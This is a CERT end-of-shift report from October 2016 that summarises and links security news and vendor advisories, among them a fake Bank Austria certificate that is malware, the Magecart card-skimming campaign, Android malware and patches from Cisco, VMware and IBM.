End-of-Shift report
Timeframe: Donnerstag 06-10-2016 18:00 − Freitag 07-10-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
Gefälschtes Bank Austria-Sicherheitszertifikat ist Schadsoftware
In einer gefälschten Bank Austria-Nachricht mit dem Betreff "Sicherheitszertifikat" behaupten Kriminelle, dass Empfänger/innen ein Programm für ihr Smartphone installieren müssen. Das ist angeblich notwendig, damit sie ihr OnlineBanking-Konto nützen können. In Wahrheit handelt es sich bei dem Programm um Schadsoftware.
https://www.watchlist-internet.at/schadsoftware/gefaelschtes-bank-austria-sicherheitszertifikat-ist-schadsoftware/
Upcoming Security Updates for Adobe Acrobat and Reader (APSB16-33)
A prenotification Security Advisory (APSB16-33) has been posted regarding upcoming releases for Adobe Acrobat and Reader scheduled for Tuesday, October 11, 2016. We will continue to provide updates on the upcoming releases via the Security Advisory as well as the Adobe...
https://blogs.adobe.com/psirt/?p=1405
100+ online shops compromised with payment data-stealing code
Since March 2016 (and possibly even earlier), someone has been compromising a variety of online shops and injecting them with malicious JavaScript code that exfiltrates payment card and other kinds of information users entered to pay for their shopping. According to RiskIQ and ClearSky researchers, the campaign - which they dubbed Magecart - is still ongoing, albeit at a reduced scope and pace. Since March, the threat actor behind it has compromised more than 100...
https://www.helpnetsecurity.com/2016/10/07/payment-data-stealing-code/
Hintergrund: Analysiert: Werbekeule statt Glitzersteine - Android-Malware CallJam seziert
Trotz verschiedener Sicherheits-Checks schleicht sich immer wieder Malware in Googles App Store. Eine davon gibt sich als vermeintliches Helferlein für das unfassbar erfolgreiche Spiel "Clash Royale" aus.
https://heise.de/-3340267
Lovoo: Sicherheitslücke ermüglicht Erstellung von Bewegungsprofilen
Über die Web-API des Dating-Dienstes ließen sich bis vor kurzem Informationen über Nutzer abrufen - auch ohne Login. Per Skript-Automatisierung können damit Bewegungsprofile erstellt werden.
http://www.golem.de/news/lovoo-sicherheitsluecke-ermoeglicht-erstellung-von-bewegungsprofilen-1610-123642-rss.html
Positive Technologies: Security Trends & Vulnerabilities Review Industrial Control Systems (PDF)
This study examines components of ICS from different vendors. In the period from 2012 to 2015, a total of 743 vulnerabilities were discovered in ICS components; most of them were detected in products from well-known companies: Siemens, Schneider Electric, and Advantech. Most vulnerabilities are of either high or medium risk (47% high, 47% medium). ... Summary: The study shows that the number of vulnerable ICS components is not reducing from year to year. Nearly half of identified...
https://www.ptsecurity.com/upload/iblock/6bd/ics_vulnerability_2016_eng.pdf
An attachment that wasn't there
By Slavo Greminger and Oli Schacher | On a daily basis we collect tons of Spam emails, which we analyze for malicious content. Of course, this is not done manually by our thousands of minions, but automated using some Python-fu. Python...
https://securityblog.switch.ch/2016/10/07/an-attachment-that-wasnt-there/
Sicherheits-Updates: Angreifer können Cisco-Switches kapern
Der Netzwerkausrüster kümmert sich um zwei als kritisch eingestufte Sicherheitslücken in Switches der Nexus-Serie und verteilt Sicherheits-Patches für 15 weitere Schwachstellen in verschiedenen Produkten.
https://heise.de/-3342846
OS X El Capitan: Warten auf das große Sicherheitsupdate
Mit Apples neuem Betriebssystem macOS Sierra werden zahlreiche Lücken gestopft, die in der Vorversion stecken. Doch ein eigenes Update für OS X El Capitan hat der Hersteller noch nicht publiziert.
https://heise.de/-3342343
Malware könnte Video und Audio vom Mac aufzeichnen
Der Sicherheitsforscher Patrick Wardle hat einen Demo-Exploit entwickelt, der Kamera- und Mikrofondaten mitschneiden kann, während Chats laufen.
https://heise.de/-3342336
VMSA-2016-0015 VMware Horizon View updates address directory traversal vulnerability (CVE-2016-7087)
Severity: Important VMware Horizon View contains a vulnerability that may allow for a directory traversal on the Horizon View Connection Server. Exploitation of this issue may lead to a partial information disclosure.
https://www.vmware.com/security/advisories/VMSA-2016-0015.html
IDM 4.5 One SSO Provider (OSP) 6.0.0.5
Abstract: This hotfix provides enhancements and software fixes for the One SSO Provider for Identity Manager. For more information about these updates, see the hotfix details.Document ID: 5256490Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:IDM45-OSP60-HF-5.zip (23.28 MB)Products:Identity Manager 4.5Access Review 1.1Access Review 1.5Superceded Patches:IDM 4.5 One SSO Provider (OSP)
https://download.novell.com/Download?buildid=Z0jKqCEDM7k~
Atlassian HipChat Secret Key Disclosure
Topic: Atlassian HipChat Secret Key Disclosure Risk: Medium Text:This email refers to the following advisory pages: * Bitbucket Server -
https://confluence.atlassian.com/x/0QkcMg * Conflue...
https://cxsecurity.com/issue/WLB-2016100066
DFN-CERT-2016-1653: KDE: Mehrere Schwachstellen in KMail ermöglichen u.a. das Ausführen beliebigen Programmcodes
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1653/
GE Bently Nevada 3500/22M Improper Authorization Vulnerability
This advisory was originally posted to the US-CERT secure Portal library on September 8, 2016, and is being released to the NCCIC/ICS-CERT web site. This advisory contains mitigation details for an improper authorization vulnerability in the GE Bently Nevada 3500/22M monitoring system.
https://ics-cert.us-cert.gov/advisories/ICSA-16-252-01
IBM Security Bulletins
IBM Security Bulletin: IBM WebSphere Dashboard Framework is affected by a security vulnerability in Apache POI (CVE-2016-5000)
http://www.ibm.com/support/docview.wss?uid=swg21991850
IBM Security Bulletin: IBM Web Experience Factory is affected by a security vulnerability in Apache POI (CVE-2016-5000)
http://www-01.ibm.com/support/docview.wss?uid=swg21991851
IBM Security Bulletin: IBM WebSphere Dashboard Framework is affected by multiple security vulnerabilities in Apache POI
http://www-01.ibm.com/support/docview.wss?uid=swg21991839
IBM Security Bulletin: IBM Web Experience Factory is affected by multiple security vulnerabilities in Apache POI
http://www-01.ibm.com/support/docview.wss?uid=swg21991845
IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Performance Tester (CVE-2016-3485)
http://www.ibm.com/support/docview.wss?uid=swg21991877
IBM Security Bulletin: : Multiple vulnerabilities in IBM Java SDK affect Rational Service Tester (CVE-2016-3485)
http://www.ibm.com/support/docview.wss?uid=swg21991879
IBM Security Bulletin: IBM Streams is affected by Open Source Apache Xerces-C XML parser Vulnerabilities (CVE-2016-4463)
http://www-01.ibm.com/support/docview.wss?uid=swg21991111
IBM Security Bulletin: IBM Streams is affected by Libxml2 vulnerabilities (CVE-2016-4447, CVE-2016-4448, CVE-2016-4449)
http://www-01.ibm.com/support/docview.wss?uid=swg21991061
IBM Security Bulletin: IBM Streams may be impacted by a vulnerability in WebSphere Liberty (CVE-2016-2923)
http://www-01.ibm.com/support/docview.wss?uid=swg21991058
IBM Security Bulletin: IBM Streams is affected by Open Source Apache Xerces-C XML parser Vulnerabilities (CVE-2016-0729)
http://www-01.ibm.com/support/docview.wss?uid=swg21991112